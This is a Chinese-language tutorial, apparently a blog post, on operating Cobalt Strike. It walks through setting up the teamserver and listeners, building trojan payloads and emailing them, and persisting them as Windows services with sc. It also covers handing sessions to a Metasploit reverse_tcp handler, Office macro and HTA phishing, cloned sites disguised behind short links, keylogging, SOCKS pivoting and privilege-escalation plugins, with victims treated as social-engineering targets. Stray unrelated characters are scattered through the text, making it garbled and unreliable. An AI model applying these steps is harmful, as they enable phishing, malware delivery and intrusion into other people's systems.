cs工具使用

CobaltStrike是一款美國RedTeam開發(fā)的滲透測試神器相味，常被業(yè)界人稱為CS盯漂。最近這個工具大火，成為了滲透測試中不可缺少的利器锌云。其擁有多種協(xié)議主機上線方式，集成了提權(quán)吁脱，憑據(jù)導(dǎo)出桑涎，端口轉(zhuǎn)發(fā)，socket代理兼贡，office攻擊石洗，文件捆綁，釣魚等功能紧显。同時讲衫，CobaltStrike還可以調(diào)用Mimikatz等其他知名工具，因此廣受黑客喜愛孵班。

CobaltStrike分為客戶端和服務(wù)端可分布式操作可以協(xié)同作戰(zhàn)涉兽。但一定要架設(shè)在外網(wǎng)上。當然你知道利用這款工具主要用于內(nèi)網(wǎng)滲透以及APT攻擊篙程。

項目官網(wǎng):https://www.cobaltstrike.com

實驗環(huán)境：

服務(wù)器端（Linux）：192.168.0.109靶機（windows）:192.168.19.130

使用cobaltstrike 3.14

實驗步驟

將工具上傳到kali系統(tǒng)中運行時給777權(quán)限

root@kali:/mnt/cobaltstrike# chmod 777

/mnt/cobaltstrike/

一枷畏、啟動，連接服務(wù)器

啟動服務(wù)端：(test 為待會靶機連接服務(wù)器的密碼）./teamserver 192.168.19.146 test

Test為密碼hash密碼要與客戶端一樣諾不一樣則此軟件存在后面

客戶端連接服務(wù)器運行：cobalstrike.bat

啟動客戶端虱饿，輸入ip拥诡，密碼触趴，端口，用戶默認

如果客戶端是Linux操作系統(tǒng)則運行以下命令渴肉，啟動客戶端：java -Dfile.encoding=UTF-8

-javaagent:CobaltStrikeCN.jar -XX:ParallelGCThreads=4 -XX:+AggressiveHeap

-XX:+UseParallelGC -jar cobaltstrike.jar

創(chuàng)建監(jiān)聽器冗懦。4.0一、創(chuàng)建監(jiān)聽器

1仇祭、點擊 Cobalt Strike ->

Listeners->Add披蕉，其中內(nèi)置了八個Payload，

wndows/beacon_dns/reverse_dns_txt

windows/beacon_http/reverse_http

windows/beacon_https/reverse_https

windows/beacon_bind_pipe

windows/beacon_tcp

windows/beacon_extc2

windows/foreign/reverse_http

windows/foreign/reverse_https

生成木馬創(chuàng)建payload 讓主機上線

運行該exe主機成功上線：可以查看上線主機的磁盤信息乌奇，進行端口掃描没讲，查看進程等信息。

同理如果將生成的artifact.exe作為附件發(fā)送給其他人礁苗，只要有人點擊爬凑，則他的機器會上線。不過現(xiàn)在的電腦都裝了殺毒軟件试伙，所以payload需做免殺贰谣。這個后續(xù)在研發(fā)

HttpsPayload應(yīng)用

優(yōu)點：可能過行為查殺、另外administrator運行可直接提升為system權(quán)限

第一步

Windows Service需要向操作系統(tǒng)注冊EXE直接運行??

第二步：創(chuàng)建服務(wù)

Sc create test binpath= ”c:\test.exe”? ? ? //創(chuàng)建的服務(wù)名迁霎，binPath后面是運行exe文件的所在路徑? ? 創(chuàng)建一個路徑一般放在C:\Windows\System32下因為這個路徑執(zhí)行文件最多

start= auto displayname= ”test”? ? ? ? ? //將exe注冊為windows服務(wù)?displayname服務(wù)器名稱

Sc start test? ? ? ? ? ? ? ? ? ? //開啟這個服務(wù)

Sc delete test? ? ? ? ? ? ? ? ? ?//刪除這個服務(wù)

Sc top test? ? ? ? ? ? ? ? ? ? ? ?//首先使用這個服務(wù)?

sc配置服務(wù)

有以下集中方式：

sc config 服務(wù)名 start= AUTO????(自動)

sc config 服務(wù)名 start= DEMAND??(手動)

sc config 服務(wù)名 start= DISABLED(禁用)

三吱抚、關(guān)于SC

可參考一個網(wǎng)友的博文---SC命令管理服務(wù)狀態(tài)：http://blog.csdn.net/ddjj_1980/article/details/7493045

1、結(jié)合metasploit,反彈shell

1. MSF中use?exploit/multi/handler考廉，然后set payload?windows/meterpreter/reverse_tcp秘豹、set lhost、set lport昌粤；然后CS中新建監(jiān)聽器既绕；一個test社工肉雞運行，然后新建監(jiān)聽器reverse_tcp派生會話涮坐，run：

新建兩個監(jiān)聽器一個放木馬上線

在靶機中使用Cobalt Strike創(chuàng)建一個windows/foreign/reverse_tcp的Listener凄贩。其中ip為Metasploit的ip地址，端口為Metasploit所監(jiān)聽的端口袱讹。

選中剛剛新建msf

session -i查看會話然后session -i 1進入

派生給reverse_tcp然后Exploit

2疲扎、office宏釣魚

攻擊→后門→MS office 然后復(fù)制惡意代碼→插入office的宏中，社工肉雞打開即可

?MSF中use?exploit/multi/handler捷雕，然后set payload?windows/meterpreter/reverse_tcp椒丧、set lhost、set lport救巷；然后CS中新建監(jiān)聽器壶熏；一個test社工肉雞運行，然后新建監(jiān)聽器reverse_tcp派生會話浦译，run：或使用另一個監(jiān)聽器可以直接在圖形化界面使用

或使用另一個監(jiān)聽器可以直接在圖形化界面使用

下載運行則中招

Cs 生成的代碼直接放到創(chuàng)建里面去棒假，注意：做試驗的時候溯职，宏的位置不要設(shè)置所有的活動模板和文檔，建設(shè)應(yīng)用在當前文檔帽哑，不然本機所有word文檔運行都會種上你的木馬谜酒，另外打開word文檔有宏提示，一般是word默認禁用所有宏（文件—選項—信任中心—信任中心設(shè)置里面配置）祝拯。

3甚带、hta網(wǎng)頁掛馬

第一步：生成hta

第二步：使用文件下載

點擊開始之后她肯，evil.hta文件會自動傳到cs uploads目錄佳头。

如果之前設(shè)置過釣魚頁面，記得一定要刪掉晴氨，不然會克隆的時候會報錯

總結(jié)：

1. 先制作HTML：http://192.168.1.184:80/test.hta

2. 釣魚攻擊→文件下載：http://192.168.1.184:80/download/file.ext

3. 釣魚攻擊→克隆網(wǎng)站：http://192.168.1.184:80/

4. 社工肉雞打開：

鍵盤記錄

4康嘉、郵件釣魚

1. 郵件釣魚：

附件下載后運行

5. 信息收集

制作好釣魚頁面：可以使用https://bitly.com制作短網(wǎng)址，然后讓對方打開：

然后設(shè)置好跳轉(zhuǎn)的網(wǎng)址

以通過https://bitly.com生成url短鏈接（）? ?

6. socks代理：

win7雙網(wǎng)卡：內(nèi)網(wǎng)：172.16.2.1????

win2003：172.16.2.2

win7雙網(wǎng)卡

2003內(nèi)網(wǎng)：172.16.2.1

MSF中：setg Proxies socks4:192.168.1.184:40520籽前；use auxiliary/scanner/smb/smb_version亭珍；然后set rhosts 172.16.2.2；run

setg Proxiessocks4:192.168.0.106:6677

也可以使用下面方法：

開啟socks4a代理枝哄，通過代理進行內(nèi)網(wǎng)滲透

開啟socks肄梨，可以通過命令，也可以通過右鍵Pivoting->SOCKS Server

beacon> socks2222

[+] startedSOCKS4a server on: 2222

[+] host calledhome, sent: 16 bytes

然后vim

/etc/proxychains.conf 挠锥，在文件末尾添加socks4代理服務(wù)器

使用proxychains代理掃描內(nèi)網(wǎng)主機??proxychains nmap -sP192.168.183.0/24

小結(jié)：

1. CS可以創(chuàng)建多個客戶端众羡，操作方便

2. 功能擴展比較多，如：payload可以多種語言蓖租。

3. 支持宏的辦公軟件都可以（office/WPS）

4. 默認宏安全性高/非常安全粱侣，運行宏時會提示；中低不會提示蓖宦，打開world有提示齐婴，說明宏很有可能有木馬。

cs提權(quán)

你以什么權(quán)限運行的木馬稠茂，那么木馬將擁有此權(quán)限柠偶，如果權(quán)限過低我們只能進行提權(quán)。

提權(quán)插件下載https://github.com/rsmudge/Elevatekit

http://k8gege.org/Download/

https://github.com/k8gege/Aggressor

選擇腳本管理器將下載好的插件放入進去不要有中午目錄

內(nèi)網(wǎng)滲透插件加使用方法